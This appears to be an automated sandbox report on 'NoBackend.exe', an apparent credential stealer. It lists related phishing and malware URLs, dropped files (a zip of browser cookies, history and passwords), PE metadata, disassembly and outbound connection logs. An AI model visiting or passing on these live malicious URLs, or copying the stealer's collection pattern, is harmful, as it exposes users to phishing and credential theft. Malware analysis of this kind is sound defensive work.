	https://damrap.com/?subid=1v9ua4l10ojg&fb=174931602346604&placement=Facebook_Mobile_Feed&adset_name=26&ad_name=8+agency43906&ac_name=%7Bfbtool.name%7D&soc_name=174931602346604&act=%7Badaccount.id%7D&ad_id=%7Bad.id%7D&fbclid=IwAR0HffiRKpm3H0P486OHVlRNYxfnILuyK41GSonGlQavYHtxKkVljhBLva8_aem_AWxp5TdeqtrHBGq2kg3C6dUbyUDCT1V1hUwLqv3rrRhmQV2Nrm78bhkLpJzTk0YugvmWqEYntedmXJhwlyzvvmuY&netProbitiya2k23=m1lfh4nter&pre=celeb2	Get hash	malicious	Unknown	Browse	1.1.1.1
	CzDgIz6T8n.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Mystic Stealer, RedLine, SmokeLoader, Vidar	Browse	104.21.65.24
	Counter_Strike2_CHEAT.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://developmentsp.com	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	172.67.201.163
	http://clicked.missbiscuit.com.au/ls/click?upn=nWCvzFVqHZVM9NpZxqA-2FmiGKIVYx7A83YEhnkHtzvz4-2BgbN1Y8I-2FA1DVlQ8e9vwjiecowziHL4AvRd7puVcY-2FDZaCy0qbSNEwvjbhK6YJkmnTcP5htDsIG25rI2rv3Tf09Ov_fEDAellvR-2FgHlWxM5z4kuNc3SFgnN0Bzgkw6T8PxhL2H4skQJ02WPAW9lIl7nwaX4jhX1cKCZM03j9ln3Bgb7jcNISYAd7CgGs2OP1FunloCeesgbx7TJOKJgCE7yit6f8roCKrNnkZLO2Mij-2FgHIuM1q3x8JJNnIdXXqe5es9DR2cn6WgzO0NKlWEW64550MpxpjkoWBB51BJ2xdR9PbQQMr76aPJ3gzZkBJ8GPEP4-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	http://developmentsp.com	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	172.67.201.163
	https://0ffice365-mangement.com	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	https://notifications.google.com/g/p/ANiao5ooAgtCIAu6G4ZsSirZpiH188XKHTHvS24A7r4OlBqLPNIZ04jd6OWjSwlXNlfrSKH01qq6fd-QXa_fEePvztnkFfydGjDv1yavUf-T0w6xco2xaqkItcHy_XBgptYataUGQX6WRkt9sfqvn9ROPbtfrG7fXAk1q3JuKJ2XBKN7r8_-Oy-lZsbUVWp7TMfWMTfR6n5oXmO6gPfpDRv4HhdiYUNGjYwNrhv2g42A7gta2A	Get hash	malicious	Unknown	Browse	104.21.0.202
	https://3sf5xhtpi4omyqw.vznvozgzqy.ru/fjj7j	Get hash	malicious	Unknown	Browse	104.17.3.184
	https://dfamilks.com	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	http://url9596.parkvantage.com/ls/click?upn=V-2FuaVAzm9xmKIeBLl0D9X-2FzhcXfebI7Ji5XpTWZEclhljSqPfQ-2BmL-2FEwMoMlHW-2FuHUfSq6RK-2FnNIpxkVpdYP636WPIdX4E8sp7h3ZsqfWiU-3Dcwy2_YHoeFa5KuxVLMreZe7v9JsRKdF-2BCM8M41Ak3s-2BVc2zW8MaLAVjqs27JMiOLOkfrla8ghnbYP7-2FoSqj6XbVIi0pmVjbbgyBCXnGzQVXAJ9cFQianL8TYGUT7RbMJLPfetUW6u-2BIR1JIEA2s9F1BH-2FCCLybL1JmAIrVX8AgBgR8CVsegFCrbDwkObeK4jAAXMAfmxa64eai77P2Nya3cBTeujKP68P-2Fyd8mpkxW-2BofaHU-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://lookerstudio.google.com/s/uGRU7BXudRA	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	http://clicked.missbiscuit.com.au/ls/click?upn=nWCvzFVqHZVM9NpZxqA-2FmpU04d5Ahfv-2B13SCZNlMhyyDK3poMqTj5a8x-2FScq-2BeCCPX87VDg1s3wdIW6xRgcBKoOMO9bvvJOOaZfr8QSd8ao-3DSa6u_IDsHxvwzVVI865JNe86QBlOxFUCulLEYvr2ez7VBfeVPQSsXLfZVexoKfnLuo6arG3FhM4ml-2BfqG0eYlMJCIsUJSaltLKrJEY15d7RIXCDUWKNcZZdbsrx6o9yHgxTWLOeAu1LrzFWtHgSqpcYRfCuyLqaIoaR2kJs4FShU9BEtCSPF5jfyLUjWUZo-2F8iKENSMJ7Q8Q6ENLryRJGxDV0Lw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	PDFpower.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://tinyurl.com/5bze3tec	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	https://dariuscooks.tv/peach-cobbler-cream-cheese-pound-cake/	Get hash	malicious	Unknown	Browse	104.26.3.146

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\LGPKVAOAL.zip

Download File

Process:	C:\Users\user\Desktop\NoBackend.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=AES Encrypted
Category:	dropped
Size (bytes):	581
Entropy (8bit):	4.641871841630351
Encrypted:	false
SSDEEP:	12:5j+dJzSjjlLLpNjumMVUgpjAGnmxpN+Ma8+N/:9+D2lLLbuogpjAGGpN3+V
MD5:	DA8C3E2770F240F0F882ACA0303379DF
SHA1:	1D19C9A755BF69D7949C82C18A4E55E5AD164BEB
SHA-256:	333EBEBAB5C65E68AC0692B48CBF95E3C82F8549C900705A3C4835EA0DE28D9A
SHA-512:	E3F179F86F7B3025BAD71CE8E7C292A3F7FC3CE42E58DD53B67BED5936D5FCA995F1A946943D7AB266DD8C084761356A84B7B8D4599915052C21D87A577D9316
Malicious:	false
Reputation:	low
Preview:	PK......c.....................Browser\cookies.txt......AE....U.5.6.5Y..].H>....X.[,..,..GPK......!.......PK......c.....................Browser\history.txt......AE....I.. )......Hoig....y..l.....EPK......!.......PK......c.....................Browser\passwords.txt......AE....m.q...L..&.w..u.<.U..K.a. ..2..PK......!.......PK........c.........!.........................Browser\cookies.txt......AE...PK........c.........!.....................m...Browser\history.txt......AE...PK........c.........!.........................Browser\passwords.txt......AE...PK..............I.....

C:\Users\user\AppData\Local\Temp\Laze1

Download File

Process:	C:\Users\user\Desktop\NoBackend.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Laze2

Download File

Process:	C:\Users\user\Desktop\NoBackend.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Laze3

Download File

Process:	C:\Users\user\Desktop\NoBackend.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Laze5

Download File

Process:	C:\Users\user\Desktop\NoBackend.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Laze6

Download File

Process:	C:\Users\user\Desktop\NoBackend.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.915601945247586
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	NoBackend.exe
File size:	8'311'808 bytes
MD5:	f6ce63ed5231cba10cdc985e60cf151f
SHA1:	15fc370f4963fe9e35948e6cb315ef77d76b01f5
SHA256:	628c1c8cd9ba30968ba9b8294bd113415f0618aa8b7c7a55307ccb176df9a02e
SHA512:	05de1784795d2bd45baf053276928d5a25f5b9ec8db99e7ec89327703019e5d59e706c5810e44af3eac08890692fe7b919c4150cb5f1bc0b7e7be8eaf7fcb74e
SSDEEP:	98304:jLjm+SXfDusXQcMEib/+CffDSfv6IjXSJ7+YMKj2y+qPoKrEv7:PLCfDusXDidSfvNF
TLSH:	28868D47EDA546A9C1A9A230C9B2D253BB71BC485B3123D32B60F7392F77BD06A75304
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........6y......."......2)...................@...........................................`... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x468880
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	4f2f006e2ecf7172ad368f8289dc96c1

Entrypoint Preview

Instruction
jmp 00007F14FD232660h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
pushfd
cld
dec eax
sub esp, 000000E0h
dec eax
mov dword ptr [esp], edi
dec eax
mov dword ptr [esp+08h], esi
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], ebx
dec esp
mov dword ptr [esp+20h], esp
dec esp
mov dword ptr [esp+28h], ebp
dec esp
mov dword ptr [esp+30h], esi
dec esp
mov dword ptr [esp+38h], edi
movups dqword ptr [esp+40h], xmm6
movups dqword ptr [esp+50h], xmm7
inc esp
movups dqword ptr [esp+60h], xmm0
inc esp
movups dqword ptr [esp+70h], xmm1
inc esp
movups dqword ptr [esp+00000080h], xmm2
inc esp
movups dqword ptr [esp+00000090h], xmm3
inc esp
movups dqword ptr [esp+000000A0h], xmm4
inc esp
movups dqword ptr [esp+000000B0h], xmm5
inc esp
movups dqword ptr [esp+000000C0h], xmm6
inc esp
movups dqword ptr [esp+000000D0h], xmm7
inc ebp
xorps xmm7, xmm7
dec ebp
xor esi, esi
dec eax
mov eax, dword ptr [0055593Eh]
dec eax
mov eax, dword ptr [eax]
dec eax
cmp eax, 00000000h
je 00007F14FD235F85h
dec esp
mov esi, dword ptr [eax]
dec eax
sub esp, 10h
dec eax
mov eax, ecx
dec eax
mov ebx, edx
call 00007F14FD21835Fh
dec eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7ea000	0x516	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x5c5000	0xec04	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7eb000	0xba12	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x528240	0x170	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2931a4	0x293200	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x295000	0x292df8	0x292e00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x528000	0x9ccb0	0x40a00	False	0.40586466392649906	data	5.123330806665631	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x5c5000	0xec04	0xee00	False	0.4024258140756303	data	5.4342596966393195	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x5d4000	0xa8	0x200	False	0.19921875	shared library	1.6345075234569126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
/4	0x5d5000	0x129	0x200	False	0.623046875	data	5.081946473254993	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/19	0x5d6000	0x71ccf	0x71e00	False	0.9996098037870472	data	7.99591134296239	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/32	0x648000	0x183eb	0x18400	False	0.9981072809278351	data	7.93742716907507	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/46	0x661000	0x18	0x200	False	0.05859375	data	0.44028372993819864	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/65	0x662000	0xc34c9	0xc3600	False	0.9989415886916186	data	7.997992546257663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/78	0x726000	0x98a42	0x98c00	False	0.9932583623158756	data	7.995580417093603	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/90	0x7bf000	0x2abd4	0x2ac00	False	0.9743752284356725	data	7.8079081240165085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata	0x7ea000	0x516	0x600	False	0.3658854166666667	data	3.919512331218315	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x7eb000	0xba12	0xbc00	False	0.259516289893617	data	5.427601621962746	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0x7f7000	0x59d96	0x59e00	False	0.22901816759388038	data	5.283753565202172	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 9, 2023 23:22:58.637007952 CET	49704	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.637041092 CET	49705	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.637048960 CET	443	49704	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.637072086 CET	443	49705	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.637121916 CET	49704	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.637140989 CET	49705	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.638125896 CET	49704	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.638142109 CET	443	49704	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.639211893 CET	49705	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.639225006 CET	443	49705	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.655231953 CET	49706	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.655260086 CET	443	49706	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.655333042 CET	49706	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.655941963 CET	49706	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.655955076 CET	443	49706	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.954893112 CET	443	49704	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.955355883 CET	49704	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.955385923 CET	443	49704	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.955550909 CET	49704	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.955555916 CET	443	49704	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.956886053 CET	443	49704	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.957055092 CET	49704	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.961836100 CET	443	49705	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.967550039 CET	443	49706	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.968652010 CET	49705	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.968671083 CET	443	49705	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.968718052 CET	49706	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.968735933 CET	443	49706	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.968992949 CET	49706	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.968997002 CET	443	49706	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.969285965 CET	49705	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.969290972 CET	443	49705	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.970701933 CET	443	49705	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.970767021 CET	49705	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:58.970999002 CET	443	49706	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:58.971052885 CET	49706	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.098225117 CET	49704	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.098228931 CET	49705	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.098453045 CET	49704	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.098459959 CET	443	49704	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.098560095 CET	443	49705	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.098716021 CET	443	49704	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.098819017 CET	49706	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.098933935 CET	49705	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.098953009 CET	443	49705	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.099016905 CET	49705	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.099104881 CET	443	49706	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.099179029 CET	49706	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.099195957 CET	443	49706	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.141256094 CET	443	49705	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.146493912 CET	49704	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.146495104 CET	49706	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.146505117 CET	443	49704	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.194108963 CET	49704	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.455988884 CET	443	49704	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.456109047 CET	443	49704	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.456181049 CET	49704	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.456506968 CET	49704	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.456523895 CET	443	49704	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.466100931 CET	443	49705	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.466379881 CET	443	49705	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.466443062 CET	49705	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.471797943 CET	443	49706	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.472122908 CET	443	49706	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.472198963 CET	49706	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.472636938 CET	49706	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.472645044 CET	443	49706	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.472681046 CET	49706	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.472686052 CET	443	49706	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.473858118 CET	49705	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.473874092 CET	443	49705	162.159.136.232	192.168.2.5
Nov 9, 2023 23:22:59.473887920 CET	49705	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:22:59.473893881 CET	443	49705	162.159.136.232	192.168.2.5
Nov 9, 2023 23:23:00.234086990 CET	49707	443	192.168.2.5	31.14.70.245
Nov 9, 2023 23:23:00.234107971 CET	443	49707	31.14.70.245	192.168.2.5
Nov 9, 2023 23:23:00.234189987 CET	49707	443	192.168.2.5	31.14.70.245
Nov 9, 2023 23:23:00.234920979 CET	49707	443	192.168.2.5	31.14.70.245
Nov 9, 2023 23:23:00.234930038 CET	443	49707	31.14.70.245	192.168.2.5
